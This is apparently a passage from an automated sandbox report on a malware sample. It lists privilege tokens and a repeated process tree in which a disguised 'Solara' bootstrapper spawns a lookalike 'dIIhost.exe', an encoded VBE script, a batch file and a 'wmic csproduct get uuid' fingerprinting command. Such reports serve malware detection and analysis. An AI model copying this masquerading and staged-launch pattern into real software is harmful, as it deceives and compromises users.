| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\862e555bc983728ac0d7e39fed087a79ec18c5db7208c839aba4db3f6bff0f06_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\862e555bc983728ac0d7e39fed087a79ec18c5db7208c839aba4db3f6bff0f06_NeikiAnalytics.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
